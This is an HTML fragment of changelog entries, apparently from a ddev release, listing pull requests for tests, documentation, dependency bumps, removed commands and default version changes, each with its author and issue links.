<li>test: don't check for expiring keys in forks, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3595807650" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7803" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7803/hovercard" href="https://github.com/ddev/ddev/pull/7803">#7803</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3608140893" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7831" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7831/hovercard" href="https://github.com/ddev/ddev/pull/7831">#7831</a></li>
<li>build(deps): bump golangci/golangci-lint-action from 8 to 9 by <a class="user-mention notranslate" data-hovercard-type="organization" data-hovercard-url="/orgs/dependabot/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dependabot">@dependabot</a>[bot] in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3608833112" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7832" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7832/hovercard" href="https://github.com/ddev/ddev/pull/7832">#7832</a></li>
<li>fix(heidisql): use <code>--databases</code> flag only when needed, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3607926680" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7829" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7829/hovercard" href="https://github.com/ddev/ddev/issues/7829">#7829</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3608027114" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7830" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7830/hovercard" href="https://github.com/ddev/ddev/pull/7830">#7830</a></li>
<li>docs: add missing dot in <code>.ddev/.env.*</code> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/yanniboi/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/yanniboi">@yanniboi</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3607674219" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7828" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7828/hovercard" href="https://github.com/ddev/ddev/pull/7828">#7828</a></li>
<li>fix(postgres): use placeholder for username, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3606943756" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7820" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7820/hovercard" href="https://github.com/ddev/ddev/issues/7820">#7820</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3607502251" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7827" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7827/hovercard" href="https://github.com/ddev/ddev/pull/7827">#7827</a></li>
<li>docs: remove community examples link in documentation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/weitzman/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/weitzman">@weitzman</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3610507416" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7834" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7834/hovercard" href="https://github.com/ddev/ddev/pull/7834">#7834</a></li>
<li>refactor: improve <code>ddev auth ssh</code> readability and reuse cmd in tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3605453229" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7816" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7816/hovercard" href="https://github.com/ddev/ddev/pull/7816">#7816</a></li>
<li>test(quickstart): check for new FrankenPHP headers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3612250250" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7836" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7836/hovercard" href="https://github.com/ddev/ddev/pull/7836">#7836</a></li>
<li>docs: Update Docker connection failure explanations with more on docker context ls by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3610102452" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7833" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7833/hovercard" href="https://github.com/ddev/ddev/pull/7833">#7833</a></li>
<li>chore(images): Remove image build for ddev-nginx-proxy-router by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3606713843" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7818" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7818/hovercard" href="https://github.com/ddev/ddev/pull/7818">#7818</a></li>
<li>chore: Remove <code>ddev utility capabilities</code> command completely, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2960861536" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7174" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7174/hovercard" href="https://github.com/ddev/ddev/issues/7174">#7174</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3603683200" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7814" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7814/hovercard" href="https://github.com/ddev/ddev/pull/7814">#7814</a></li>
<li>build: fix getopt detection on macOS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/deviantintegral/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/deviantintegral">@deviantintegral</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3616760281" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7846" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7846/hovercard" href="https://github.com/ddev/ddev/pull/7846">#7846</a></li>
<li>docs: Add Claude Code for Web environment configuration guide [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3613230423" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7838" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7838/hovercard" href="https://github.com/ddev/ddev/pull/7838">#7838</a></li>
<li>chore(traefik): Remove redundant Traefik rule syntax configuration, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3606964158" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7822" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7822/hovercard" href="https://github.com/ddev/ddev/issues/7822">#7822</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3607031328" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7823" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7823/hovercard" href="https://github.com/ddev/ddev/pull/7823">#7823</a></li>
<li>chore: Remove NFS support for v1.25.0, remove unused CircleCI config, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3603678152" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7810" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7810/hovercard" href="https://github.com/ddev/ddev/issues/7810">#7810</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3603679025" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7811" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7811/hovercard" href="https://github.com/ddev/ddev/pull/7811">#7811</a></li>
<li>build: use debian:trixie as base for ddev-webserver by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3443242404" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7649" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7649/hovercard" href="https://github.com/ddev/ddev/pull/7649">#7649</a></li>
<li>fix(heidisql): add default <code>--databases=db</code> to postgres, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3608027114" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7830" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7830/hovercard" href="https://github.com/ddev/ddev/pull/7830">#7830</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/raphaelportmann/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/raphaelportmann">@raphaelportmann</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3616947637" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7847" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7847/hovercard" href="https://github.com/ddev/ddev/pull/7847">#7847</a></li>
<li>test(timezone): Windows may show 'Universal' instead of UTC by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3618655010" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7848" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7848/hovercard" href="https://github.com/ddev/ddev/pull/7848">#7848</a></li>
<li>build(deps): bump docker to v29 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3611743898" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7835" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7835/hovercard" href="https://github.com/ddev/ddev/pull/7835">#7835</a></li>
<li>test(share): Fix TestShareCmd to handle non-string types in JSON logs by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3621556499" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7851" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7851/hovercard" href="https://github.com/ddev/ddev/pull/7851">#7851</a></li>
<li>fix: remove trailing comma from schema.json by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3620741092" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7850" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7850/hovercard" href="https://github.com/ddev/ddev/pull/7850">#7850</a></li>
<li>fix: Disable 64-bit file system redirection in Windows installer Section to access wsl.exe by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3613492688" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7839" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7839/hovercard" href="https://github.com/ddev/ddev/pull/7839">#7839</a></li>
<li>test(typo3): Fix Apache version of TYPO3 TestDdevFullSiteSetup and untarring symlinks, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3548109039" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7754" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7754/hovercard" href="https://github.com/ddev/ddev/issues/7754">#7754</a>, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2842752869" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/6972" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/6972/hovercard" href="https://github.com/ddev/ddev/issues/6972">#6972</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3606439641" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7817" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7817/hovercard" href="https://github.com/ddev/ddev/pull/7817">#7817</a></li>
<li>test(pantheon): fix TestPantheonPush, which was broken by composer 2.9 [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623124667" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7854" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7854/hovercard" href="https://github.com/ddev/ddev/pull/7854">#7854</a></li>
<li>test: Add CI tests for ddev-hostname with passwordless sudo, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3586971253" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7795" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7795/hovercard" href="https://github.com/ddev/ddev/issues/7795">#7795</a> [skip buildkite] by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623170551" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7855" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7855/hovercard" href="https://github.com/ddev/ddev/pull/7855">#7855</a></li>
<li>test: prevent panic in TestDownloadAndExtractTarball when cleanup is nil, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3447199766" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7652" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7652/hovercard" href="https://github.com/ddev/ddev/issues/7652">#7652</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623182052" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7857" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7857/hovercard" href="https://github.com/ddev/ddev/pull/7857">#7857</a></li>
<li>chore: Change xhprof_mode default from prepend to xhgui, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3603673779" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7808" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7808/hovercard" href="https://github.com/ddev/ddev/issues/7808">#7808</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3603674354" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7809" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7809/hovercard" href="https://github.com/ddev/ddev/pull/7809">#7809</a></li>
<li>docs: clarify instructions for disabling mutagen on a single project by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/q0rban/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/q0rban">@q0rban</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626113413" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7861" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7861/hovercard" href="https://github.com/ddev/ddev/pull/7861">#7861</a></li>
<li>test: Can't do ddev-hostname on WSL2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626004990" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7860" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7860/hovercard" href="https://github.com/ddev/ddev/pull/7860">#7860</a></li>
<li>test: default key expiration 90 days, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3608140893" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7831" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7831/hovercard" href="https://github.com/ddev/ddev/pull/7831">#7831</a> [skip ci] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3633922863" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7873" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7873/hovercard" href="https://github.com/ddev/ddev/pull/7873">#7873</a></li>
<li>chore(nodejs): Change default nodejs_version for new projects to 24, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3606899582" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7819" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7819/hovercard" href="https://github.com/ddev/ddev/issues/7819">#7819</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3606952540" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7821" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7821/hovercard" href="https://github.com/ddev/ddev/pull/7821">#7821</a></li>
<li>ci(golangci-lint): add import-shadowing check by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3627089815" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7865" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7865/hovercard" href="https://github.com/ddev/ddev/pull/7865">#7865</a></li>
<li>test: stop project after addon tests that create docker-compose services, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3398423333" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7607" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7607/hovercard" href="https://github.com/ddev/ddev/issues/7607">#7607</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3623187908" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7858" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7858/hovercard" href="https://github.com/ddev/ddev/pull/7858">#7858</a></li>
<li>docs(fritzbox): Update FritzBox references and point to new blog by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3628900206" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7867" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7867/hovercard" href="https://github.com/ddev/ddev/pull/7867">#7867</a></li>
<li>chore: Remove <code>ddev service</code> command, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3603680999" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7812" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7812/hovercard" href="https://github.com/ddev/ddev/issues/7812">#7812</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3603681630" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7813" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7813/hovercard" href="https://github.com/ddev/ddev/pull/7813">#7813</a></li>
<li>chore(deprecation): remove ddev nvm functionality in v1.25.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3607275294" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7826" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7826/hovercard" href="https://github.com/ddev/ddev/pull/7826">#7826</a></li>
<li>fix(quickstart): temporarily install Composer from snapshot for 2.9 compatibility by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626977833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7864" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7864/hovercard" href="https://github.com/ddev/ddev/pull/7864">#7864</a></li>
<li>docs(xdebug): Add details on how to repair WSL2 networking by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3640543977" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7879" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7879/hovercard" href="https://github.com/ddev/ddev/pull/7879">#7879</a></li>
<li>docs: fix MD060 table column style errors for markdownlint v0.37+ [skip buildkite] by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3643053722" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7882" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7882/hovercard" href="https://github.com/ddev/ddev/pull/7882">#7882</a></li>
<li>test(quickstart): pin Composer to 2.8.12 for Magento 2 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3643114073" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7883" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7883/hovercard" href="https://github.com/ddev/ddev/pull/7883">#7883</a></li>
<li>test(wsl-mirrored): Skip TestGetLocalHTTPResponse on WSL2 mirrored by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3643684702" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7884" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7884/hovercard" href="https://github.com/ddev/ddev/pull/7884">#7884</a></li>
<li>feat: Change default PHP version to 8.4, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3634133257" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7874" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7874/hovercard" href="https://github.com/ddev/ddev/issues/7874">#7874</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3634135609" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7875" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7875/hovercard" href="https://github.com/ddev/ddev/pull/7875">#7875</a></li>
<li>chore(composer): remove <code>--snapshot</code> workaround, for <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3626977833" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7864" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7864/hovercard" href="https://github.com/ddev/ddev/pull/7864">#7864</a> by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3646682854" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7887" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7887/hovercard" href="https://github.com/ddev/ddev/pull/7887">#7887</a></li>
<li>test(quickstart): fix Backdrop, FrankenPHP, Grav by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/stasadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/stasadev">@stasadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3646670989" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7886" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7886/hovercard" href="https://github.com/ddev/ddev/pull/7886">#7886</a></li>
<li>fix: Add gpgv, configure APT, convert sources to deb822 (except mariadb), update script references, and add audit tests to prevent SHA1 key trust failures in February 2026, fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3618938410" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7849" data-hovercard-type="issue" data-hovercard-url="/ddev/ddev/issues/7849/hovercard" href="https://github.com/ddev/ddev/issues/7849">#7849</a> by @Copilot in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3634197394" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7877" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7877/hovercard" href="https://github.com/ddev/ddev/pull/7877">#7877</a></li>
<li>test(windows): make sure we have a  clean install distro by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3655266651" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7891" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7891/hovercard" href="https://github.com/ddev/ddev/pull/7891">#7891</a></li>
<li>docs: stop recommending Stack Overflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rfay/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rfay">@rfay</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3658941875" data-permission-text="Title is private" data-url="https://github.com/ddev/ddev/issues/7895" data-hovercard-type="pull_request" data-hovercard-url="/ddev/ddev/pull/7895/hovercard" href="https://github.com/ddev/ddev/pull/7895">#7895</a></li>
